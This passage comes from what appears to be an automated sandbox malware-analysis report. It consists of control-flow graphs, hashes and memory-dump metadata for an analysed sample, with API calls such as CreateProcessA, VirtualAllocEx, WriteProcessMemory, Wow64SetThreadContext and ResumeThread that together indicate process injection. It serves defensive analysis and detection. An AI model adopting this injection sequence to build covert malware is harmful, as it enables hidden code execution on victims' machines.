33022->33023 33025 7d75f3d 33023->33025 33025->32939 33027 7d75ec0 VirtualAllocEx 33026->33027 33029 7d75f3d 33027->33029 33029->32939 33031 7d75fc8 WriteProcessMemory 33030->33031 33033 7d7601f 33031->33033 33033->32949 33035 7d75f80 WriteProcessMemory 33034->33035 33037 7d7601f 33035->33037 33037->32949 33039 7d75940 ResumeThread 33038->33039 33041 7d75971 33039->33041 33041->32959 33043 7d75900 ResumeThread 33042->33043 33045 7d75971 33043->33045 33045->32959 33047 7d75de8 Wow64SetThreadContext 33046->33047 33049 7d75e75 33047->33049 33049->32973 33051 7d75e2d Wow64SetThreadContext 33050->33051 33053 7d75e75 33051->33053 33053->32973 33054 6592740 33055 659278e DrawTextExW 33054->33055 33057 65927e6 33055->33057 33155 31fd560 33156 31fd5a6 GetCurrentProcess 33155->33156 33158 31fd5f8 GetCurrentThread 33156->33158 33159 31fd5f1 33156->33159 33160 31fd62e 33158->33160 33161 31fd635 GetCurrentProcess 33158->33161 33159->33158 33160->33161 33162 31fd66b 33161->33162 33163 31fd693 GetCurrentThreadId 33162->33163 33164 31fd6c4 33163->33164

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 338 65911fc-65935f0 341 6593ad3-6593b3c 338->341 342 65935f6-65935fb 338->342 349 6593b43-6593bcb 341->349 342->341 343 6593601-659361e 342->343 343->349 350 6593624-6593628 343->350 394 6593bd6-6593c56 349->394 351 659362a-6593634 call 659120c 350->351 352 6593637-659363b 350->352 351->352 356 659364a-6593651 352->356 357 659363d-6593647 call 659120c 352->357 359 659376c-6593771 356->359 360 6593657-6593687 356->360 357->356 363 6593779-659377e 359->363 364 6593773-6593777 359->364 371 6593e56-6593e7c 360->371 373 659368d-6593760 call 6591218 * 2 360->373 368 6593790-65937c0 call 6591224 * 3 363->368 364->363 367 6593780-6593784 364->367 370 659378a-659378d 367->370 367->371 368->394 395 65937c6-65937c9 368->395 370->368 386 6593e8c 371->386 387 6593e7e-6593e8a 371->387 373->359 403 6593762 373->403 391 6593e8f-6593e94 386->391 387->391 410 6593c5d-6593cdf 394->410 395->394 398 65937cf-65937d1 395->398 398->394 401 65937d7-659380c 398->401 401->410 411 6593812-659381b 401->411 403->359 416 6593ce7-6593d69 410->416 412 659397e-6593982 411->412 413 6593821-659387b call 6591224 * 2 call 6591234 * 2 411->413 415 6593988-659398c 412->415 412->416 459 659388d 413->459 460 659387d-6593886 413->460 420 6593d71-6593d9e 415->420 421 6593992-6593998 415->421 416->420 432 6593da5-6593e25 420->432 424 659399a 421->424 425 659399c-65939d1 421->425 430 65939d8-65939de 424->430 425->430 430->432 433 65939e4-65939ec 430->433 493 6593e2c-6593e4e 432->493 438 65939ee-65939f2 433->438 439 65939f3-65939f5 433->439 438->439 444 6593a57-6593a5d 439->444 445 65939f7-6593a1b 439->445 453 6593a7c-6593aaa 444->453 454 6593a5f-6593a7a 444->454 478 6593a1d-6593a22 445->478 479 6593a24-6593a28 445->479 470 6593ab2-6593abe 453->470 454->470 462 6593891-6593893 459->462 460->462 466 6593888-659388b 460->466 468 659389a-659389e 462->468 469 6593895 462->469 466->462 475 65938ac-65938b2 468->475 476 65938a0-65938a7 468->476 469->468 470->493 494 6593ac4-6593ad0 470->494 482 65938bc-65938c1 475->482 483 65938b4-65938ba 475->483 481 6593949-659394d 476->481 485 6593a34-6593a45 478->485 479->371 486 6593a2e-6593a31 479->486 491 659396c-6593978 481->491 492 659394f-6593969 481->492 489 65938c7-65938cd 482->489 483->489 528 6593a47 call 6593edf 485->528 529 6593a47 call 6593ef0 485->529 486->485 497 65938cf-65938d1 489->497 498 65938d3-65938d8 489->498 491->412 491->413 492->491 493->371 504 65938da-65938ec 497->504 498->504 501 6593a4d-6593a55 501->470 509 65938ee-65938f4 504->509 510 65938f6-65938fb 504->510 511 6593901-6593908 509->511 510->511 515 659390a-659390c 511->515 516 659390e 511->516 519 6593913-659391e 515->519 516->519 520 6593920-6593923 519->520 521 6593942 519->521 520->481 523 6593925-659392b 520->523 521->481 524 659392d-6593930 523->524 525 6593932-659393b 523->525 524->521 524->525 525->481 527 659393d-6593940 525->527 527->481 527->521 528->501 529->501
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Hjq$Hjq$Hjq$Hjq$Hjq
                                                                                                                                              • API String ID: 0-1529018591
                                                                                                                                              • Opcode ID: 1d13293fa013a6f87feae6710da2e2554742aa1e3a68799e0d42bb6db47e787e
                                                                                                                                              • Instruction ID: 7fcce9063920cc1549d68fd94361b02d4171f57e292bca1567f31e4743df4cf9
                                                                                                                                              • Opcode Fuzzy Hash: 1d13293fa013a6f87feae6710da2e2554742aa1e3a68799e0d42bb6db47e787e
                                                                                                                                              • Instruction Fuzzy Hash: 2A324C70E00259CFDF98DFA9C85479EBBB2BF84300F148569D409AB385DB349D85CBA5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 530 65994f0-6599518 531 659951a 530->531 532 659951f-65995db 530->532 531->532 535 65995dd-6599603 532->535 536 65995e0-65995ed 532->536 538 6599609-6599633 535->538 539 6599af3-6599b35 535->539 536->535 542 6599639-6599651 538->542 543 6599d00-6599d0c 538->543 547 6599b38-6599b3c 539->547 545 6599d12-6599d1b 542->545 546 6599657-6599658 542->546 543->545 551 6599d21-6599d2d 545->551 548 6599ce6-6599cf2 546->548 552 659970e-6599712 547->552 553 6599b42-6599b48 547->553 549 6599cf8-6599cff 548->549 550 659965d-6599669 548->550 557 659966b 550->557 558 6599670-659968b 550->558 561 6599d33-6599d3f 551->561 555 6599724-659972a 552->555 556 6599714-6599722 552->556 553->539 554 6599b4a-6599ba5 553->554 579 6599bdc-6599c06 554->579 580 6599ba7-6599bda 554->580 559 659976f-6599773 555->559 562 6599782-65997b4 556->562 557->558 558->551 560 6599691-65996b6 558->560 563 659972c-6599738 559->563 564 6599775 559->564 560->561 574 65996bc-65996be 560->574 570 6599d45-6599d4c 561->570 584 65997de 562->584 585 65997b6-65997c2 562->585 566 659973a 563->566 567 659973f-6599747 563->567 569 6599778-659977c 564->569 566->567 572 6599749-659975d 567->572 573 659976c 567->573 569->562 575 65996f4-659970b 569->575 577 65996c1-65996cc 572->577 578 6599763-659976a 572->578 573->559 574->577 575->552 577->570 582 65996d2-65996ef 577->582 578->564 591 6599c0f-6599c8e 579->591 580->591 582->569 589 65997e4-6599811 584->589 586 65997cc-65997d2 585->586 587 65997c4-65997ca 585->587 592 65997dc 586->592 587->592 597 6599860-65998f3 589->597 598 6599813-659984b 589->598 605 6599c95-6599ca8 591->605 592->589 613 65998fc-65998fd 597->613 614 65998f5 597->614 606 6599cb7-6599cbc 598->606 605->606 608 6599cbe-6599ccc 606->608 609 6599cd3-6599ce3 606->609 608->609 609->548 615 659994e-6599954 613->615 614->613 616 65998ff-659991e 615->616 617 6599956-6599a18 615->617 618 6599920 616->618 619 6599925-659994b 616->619 628 6599a59-6599a5d 617->628 629 6599a1a-6599a53 617->629 618->619 619->615 630 6599a5f-6599a98 628->630 631 6599a9e-6599aa2 628->631 629->628 630->631 633 6599ae3-6599ae7 631->633 634 6599aa4-6599add 631->634 633->554 635 6599ae9-6599af1 633->635 634->633 635->547
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4'fq$:$pjq$~
                                                                                                                                              • API String ID: 0-2740937384
                                                                                                                                              • Opcode ID: a2ba4c41d2bae1e4eccae7f7cb39148080e335b94000e887a0fa5e96dda7c13a
                                                                                                                                              • Instruction ID: a370e99187236669caa6845642d9db942b2becefcd19a60fb19b82c6fe653162
                                                                                                                                              • Opcode Fuzzy Hash: a2ba4c41d2bae1e4eccae7f7cb39148080e335b94000e887a0fa5e96dda7c13a
                                                                                                                                              • Instruction Fuzzy Hash: EA42EF75A00218DFDB65CFA9C980B99BBB2FF49300F1580E9E509AB261DB31AD91DF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f62430113f2cb7ec2c03412e3af338ec4521df560a5da9b328cef0ef984db084
                                                                                                                                              • Instruction ID: 5fc7b856cf7b0add18a10ce6522497e05dd71a3ccf6b68aa658065fa31692b17
                                                                                                                                              • Opcode Fuzzy Hash: f62430113f2cb7ec2c03412e3af338ec4521df560a5da9b328cef0ef984db084
                                                                                                                                              • Instruction Fuzzy Hash: ECE1BCB2B017058FDB29DB79C460BAEB7F6EF89304F14446DD1899B290EB35E901CB51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 93e0eeedcd64d6be454c6171312abb892e1b3f4e9e55cfc7a3bf432cf1cb3cb5
                                                                                                                                              • Instruction ID: bd4caa0c0f1b67061a5668e222da1fd57adba81090ed662fac7f7227dea5a81a
                                                                                                                                              • Opcode Fuzzy Hash: 93e0eeedcd64d6be454c6171312abb892e1b3f4e9e55cfc7a3bf432cf1cb3cb5
                                                                                                                                              • Instruction Fuzzy Hash: 03C15A70E00659DFCF64DFA5C880799BBB2BF88300F04C5AAD419AB255EB309985CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 53931f960b198d3d1b492c607a461ed96cf198009833c66687086060fd65b816
                                                                                                                                              • Instruction ID: 1b10fc20ec627931290837285a9183dd16b85c2df0d13dad79d935fd3e372e6d
                                                                                                                                              • Opcode Fuzzy Hash: 53931f960b198d3d1b492c607a461ed96cf198009833c66687086060fd65b816
                                                                                                                                              • Instruction Fuzzy Hash: C3518174E012098FCB08DFA9D8949EEBBF6FF88310F14816AD519AB364DB359945CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 53bbbaa5fc259ca872ed7d96904572619b0d9c21c32fb9469f7ad7996a2fee70
                                                                                                                                              • Instruction ID: a6224f74a50b600d5ac6ffbaf47fffb29fcf9afbcdce5e03fbbeef157d84dbd8
                                                                                                                                              • Opcode Fuzzy Hash: 53bbbaa5fc259ca872ed7d96904572619b0d9c21c32fb9469f7ad7996a2fee70
                                                                                                                                              • Instruction Fuzzy Hash: 86518274E012099FCB08DFA9D8949EEBBF6FF88310F14852AD519AB364DB319945CF90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 294 31fd550-31fd5ef GetCurrentProcess 298 31fd5f8-31fd62c GetCurrentThread 294->298 299 31fd5f1-31fd5f7 294->299 300 31fd62e-31fd634 298->300 301 31fd635-31fd669 GetCurrentProcess 298->301 299->298 300->301 302 31fd66b-31fd671 301->302 303 31fd672-31fd68d call 31fd731 301->303 302->303 307 31fd693-31fd6c2 GetCurrentThreadId 303->307 308 31fd6cb-31fd72d 307->308 309 31fd6c4-31fd6ca 307->309 309->308
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 031FD5DE
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 031FD61B
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 031FD658
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 031FD6B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2063062207-4160683662
                                                                                                                                              • Opcode ID: 3522914e4b79f33fa9b7db59719c2f6ce3138b0b32a3ea96b5d58401c8ef63ed
                                                                                                                                              • Instruction ID: faf4a266e404e5eda735cc960f113ef9e28c5b88a79597e277d94e191f56741d
                                                                                                                                              • Opcode Fuzzy Hash: 3522914e4b79f33fa9b7db59719c2f6ce3138b0b32a3ea96b5d58401c8ef63ed
                                                                                                                                              • Instruction Fuzzy Hash: 265178B0900349CFDB14DFA9D588BAEBFF5AF88314F24845AE018A7360DB355944CB66

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 316 31fd560-31fd5ef GetCurrentProcess 320 31fd5f8-31fd62c GetCurrentThread 316->320 321 31fd5f1-31fd5f7 316->321 322 31fd62e-31fd634 320->322 323 31fd635-31fd669 GetCurrentProcess 320->323 321->320 322->323 324 31fd66b-31fd671 323->324 325 31fd672-31fd68d call 31fd731 323->325 324->325 329 31fd693-31fd6c2 GetCurrentThreadId 325->329 330 31fd6cb-31fd72d 329->330 331 31fd6c4-31fd6ca 329->331 331->330
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 031FD5DE
                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 031FD61B
                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 031FD658
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 031FD6B1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2063062207-4160683662
                                                                                                                                              • Opcode ID: 4834347fe4a152afa81b69df509862d7dd554f3cabfebb3fdfc2fee3ae431a8f
                                                                                                                                              • Instruction ID: 3114e0ecd267a8c2c7816f62d22d3257fc6b21308ab5311b39e4c3ba37b16a8d
                                                                                                                                              • Opcode Fuzzy Hash: 4834347fe4a152afa81b69df509862d7dd554f3cabfebb3fdfc2fee3ae431a8f
                                                                                                                                              • Instruction Fuzzy Hash: 4E5167B0900249CFDB14DFA9D688BAEBBF5EF88314F24845AE018A7360DB355944CB65

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 638 7d761fc-7d76204 639 7d76206-7d7626c 638->639 640 7d7626f-7d7629d 638->640 639->640 643 7d762d6-7d762f6 640->643 644 7d7629f-7d762a9 640->644 651 7d7632f-7d7635e 643->651 652 7d762f8-7d76302 643->652 644->643 645 7d762ab-7d762ad 644->645 646 7d762d0-7d762d3 645->646 647 7d762af-7d762b9 645->647 646->643 649 7d762bd-7d762cc 647->649 650 7d762bb 647->650 649->649 653 7d762ce 649->653 650->649 658 7d76397-7d76451 CreateProcessA 651->658 659 7d76360-7d7636a 651->659 652->651 654 7d76304-7d76306 652->654 653->646 656 7d76329-7d7632c 654->656 657 7d76308-7d76312 654->657 656->651 660 7d76316-7d76325 657->660 661 7d76314 657->661 672 7d76453-7d76459 658->672 673 7d7645a-7d764e0 658->673 659->658 662 7d7636c-7d7636e 659->662 660->660 663 7d76327 660->663 661->660 664 7d76391-7d76394 662->664 665 7d76370-7d7637a 662->665 663->656 664->658 667 7d7637e-7d7638d 665->667 668 7d7637c 665->668 667->667 669 7d7638f 667->669 668->667 669->664 672->673 683 7d764e2-7d764e6 673->683 684 7d764f0-7d764f4 673->684 683->684 685 7d764e8 683->685 686 7d764f6-7d764fa 684->686 687 7d76504-7d76508 684->687 685->684 686->687 688 7d764fc 686->688 689 7d7650a-7d7650e 687->689 690 7d76518-7d7651c 687->690 688->687 689->690 691 7d76510 689->691 692 7d7652e-7d76535 690->692 693 7d7651e-7d76524 690->693 691->690 694 7d76537-7d76546 692->694 695 7d7654c 692->695 693->692 694->695 697 7d7654d 695->697 697->697
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D7643E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID: ^gd$^gd
                                                                                                                                              • API String ID: 963392458-4222006328
                                                                                                                                              • Opcode ID: 2145b9d6097f1d79b4c7f18840bf0d02319e0a5339b7a07c5b3e2352e85c4e59
                                                                                                                                              • Instruction ID: d226e0d3792e8f8cb806bf63e048e17ab30b385beb7c5769f2f9024c44b73e1d
                                                                                                                                              • Opcode Fuzzy Hash: 2145b9d6097f1d79b4c7f18840bf0d02319e0a5339b7a07c5b3e2352e85c4e59
                                                                                                                                              • Instruction Fuzzy Hash: D2A15CB1D0061ADFDB24CFA8C941BDEFBB2BF48314F148569D808A7244EB759985CF92

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 698 7d76208-7d7629d 701 7d762d6-7d762f6 698->701 702 7d7629f-7d762a9 698->702 709 7d7632f-7d7635e 701->709 710 7d762f8-7d76302 701->710 702->701 703 7d762ab-7d762ad 702->703 704 7d762d0-7d762d3 703->704 705 7d762af-7d762b9 703->705 704->701 707 7d762bd-7d762cc 705->707 708 7d762bb 705->708 707->707 711 7d762ce 707->711 708->707 716 7d76397-7d76451 CreateProcessA 709->716 717 7d76360-7d7636a 709->717 710->709 712 7d76304-7d76306 710->712 711->704 714 7d76329-7d7632c 712->714 715 7d76308-7d76312 712->715 714->709 718 7d76316-7d76325 715->718 719 7d76314 715->719 730 7d76453-7d76459 716->730 731 7d7645a-7d764e0 716->731 717->716 720 7d7636c-7d7636e 717->720 718->718 721 7d76327 718->721 719->718 722 7d76391-7d76394 720->722 723 7d76370-7d7637a 720->723 721->714 722->716 725 7d7637e-7d7638d 723->725 726 7d7637c 723->726 725->725 727 7d7638f 725->727 726->725 727->722 730->731 741 7d764e2-7d764e6 731->741 742 7d764f0-7d764f4 731->742 741->742 743 7d764e8 741->743 744 7d764f6-7d764fa 742->744 745 7d76504-7d76508 742->745 743->742 744->745 746 7d764fc 744->746 747 7d7650a-7d7650e 745->747 748 7d76518-7d7651c 745->748 746->745 747->748 749 7d76510 747->749 750 7d7652e-7d76535 748->750 751 7d7651e-7d76524 748->751 749->748 752 7d76537-7d76546 750->752 753 7d7654c 750->753 751->750 752->753 755 7d7654d 753->755 755->755
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D7643E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1743880780.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7d70000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcess
                                                                                                                                              • String ID: ^gd$^gd
                                                                                                                                              • API String ID: 963392458-4222006328
                                                                                                                                              • Opcode ID: 4f079cd18b2456603ed2263f5a730c69424113c1e10aa449d6ac40f40c6df84a
                                                                                                                                              • Instruction ID: 5acd492c089d230a6ddbf6e181d6356788059093e24aa370bbf88dc6c3f06e79
                                                                                                                                              • Opcode Fuzzy Hash: 4f079cd18b2456603ed2263f5a730c69424113c1e10aa449d6ac40f40c6df84a
                                                                                                                                              • Instruction Fuzzy Hash: 5E914BB1D0061ADFDB24CFA8C941BDEFBB2BF48314F148569D808A7284EB759985CF91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 886 31faeb8-31faec0 887 31fae62-31fae95 886->887 888 31faec2-31faed7 886->888 901 31fae97-31faea2 887->901 902 31faea4-31faeac 887->902 889 31faed9-31faee6 call 31fa240 888->889 890 31faf03-31faf07 888->890 899 31faefc 889->899 900 31faee8 889->900 893 31faf1b-31faf5c 890->893 894 31faf09-31faf13 890->894 903 31faf5e-31faf66 893->903 904 31faf69-31faf77 893->904 894->893 899->890 949 31faeee call 31fb151 900->949 950 31faeee call 31fb160 900->950 905 31faeaf-31faeb4 901->905 902->905 903->904 906 31faf9b-31faf9d 904->906 907 31faf79-31faf7e 904->907 912 31fafa0-31fafa7 906->912 909 31faf89 907->909 910 31faf80-31faf87 call 31fa24c 907->910 908 31faef4-31faef6 908->899 911 31fb038-31fb0f8 908->911 916 31faf8b-31faf99 909->916 910->916 944 31fb0fa-31fb0fd 911->944 945 31fb100-31fb12b GetModuleHandleW 911->945 913 31fafa9-31fafb1 912->913 914 31fafb4-31fafbb 912->914 913->914 917 31fafbd-31fafc5 914->917 918 31fafc8-31fafd1 call 31fa25c 914->918 916->912 917->918 924 31fafde-31fafe3 918->924 925 31fafd3-31fafdb 918->925 926 31fafe5-31fafec 924->926 927 31fb001-31fb00e 924->927 925->924 926->927 929 31fafee-31faffe call 31fa26c call 31fa27c 926->929 933 31fb031-31fb037 927->933 934 31fb010-31fb02e 927->934 929->927 934->933 944->945 946 31fb12d-31fb133 945->946 947 31fb134-31fb148 945->947 946->947 949->908 950->908
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 031FB11E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 4139908857-4160683662
                                                                                                                                              • Opcode ID: bf44478f2cdde8612847a478e7347b50d3f04b2a6c8f144792119a861b13f556
                                                                                                                                              • Instruction ID: b3235197886e77f58409edbe4fd8f4cbbb7b2704d606f7defe0377df0abf2a89
                                                                                                                                              • Opcode Fuzzy Hash: bf44478f2cdde8612847a478e7347b50d3f04b2a6c8f144792119a861b13f556
                                                                                                                                              • Instruction Fuzzy Hash: 729166B0A00B458FD725DF29D48475ABBF5FF88304F04896EE18ACBA41D739E855CB91

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 951 31f590c-31f59d9 CreateActCtxA 953 31f59db-31f59e1 951->953 954 31f59e2-31f5a3c 951->954 953->954 961 31f5a3e-31f5a41 954->961 962 31f5a4b-31f5a4f 954->962 961->962 963 31f5a51-31f5a5d 962->963 964 31f5a60 962->964 963->964 965 31f5a61 964->965 965->965
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 031F59C9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2289755597-4160683662
                                                                                                                                              • Opcode ID: 39862fa18391ed9aeb04e4f5835402a7314ae575cb4339a5fc7e309d877b19a7
                                                                                                                                              • Instruction ID: 6d560bec2c4a19dc8ad5837ff66074979d6fb6fbee8d62dbd116376f1b7a432e
                                                                                                                                              • Opcode Fuzzy Hash: 39862fa18391ed9aeb04e4f5835402a7314ae575cb4339a5fc7e309d877b19a7
                                                                                                                                              • Instruction Fuzzy Hash: 4241E2B0C00619CFDF25CFA9C985B8DBBB2BF49304F24815AD418AB255DB756945CF90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 967 31f44b0-31f59d9 CreateActCtxA 970 31f59db-31f59e1 967->970 971 31f59e2-31f5a3c 967->971 970->971 978 31f5a3e-31f5a41 971->978 979 31f5a4b-31f5a4f 971->979 978->979 980 31f5a51-31f5a5d 979->980 981 31f5a60 979->981 980->981 982 31f5a61 981->982 982->982
                                                                                                                                              APIs
                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 031F59C9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1740410941.00000000031F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_31f0000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Create
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 2289755597-4160683662
                                                                                                                                              • Opcode ID: 541e489a66bec57c9c20f69c57fa8ea98c3f5253396363a8c3cc072a4e242951
                                                                                                                                              • Instruction ID: c7c6dd3451e130100b7e7fb8a5a1ce5b89f9cf81a291811d9e994293e3326d0a
                                                                                                                                              • Opcode Fuzzy Hash: 541e489a66bec57c9c20f69c57fa8ea98c3f5253396363a8c3cc072a4e242951
                                                                                                                                              • Instruction Fuzzy Hash: 7841EDB0C0061DCFDB24CFA9C985B8EBBB6BF49314F20816AD418AB255DB756945CF90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 984 6593ef0-6593f02 985 6593f0a-6593f15 984->985 986 6593f05 call 6591244 984->986 987 6593f2a-6593fbc CreateIconFromResourceEx 985->987 988 6593f17-6593f27 985->988 986->985 992 6593fbe-6593fc4 987->992 993 6593fc5-6593fe2 987->993 992->993
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1742863146.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6590000_9dOKGgFNL2.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                                              • String ID: ^gd
                                                                                                                                              • API String ID: 3668623891-4160683662
                                                                                                                                              • Opcode ID: 812b381d3beea6f4acf94cf647f4ea7580fcc95b4a171ead4f9ab25e193be0b1
                                                                                                                                              • Instruction ID: a1bfd37ada2df21d7e9bf43a8f3b07431b20365e679dddb21275cba960dfa4ad
                                                                                                                                              • Opcode Fuzzy Hash: 812b381d3beea6f4acf94cf647f4ea7580fcc95b4a171ead4f9ab25e193be0b1
                                                                                                                                              • Instruction Fuzzy Hash: 90318B718052899FCF11CFA9D804AEABFF8EF49310F14805AF914A7251C3359850DFB1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
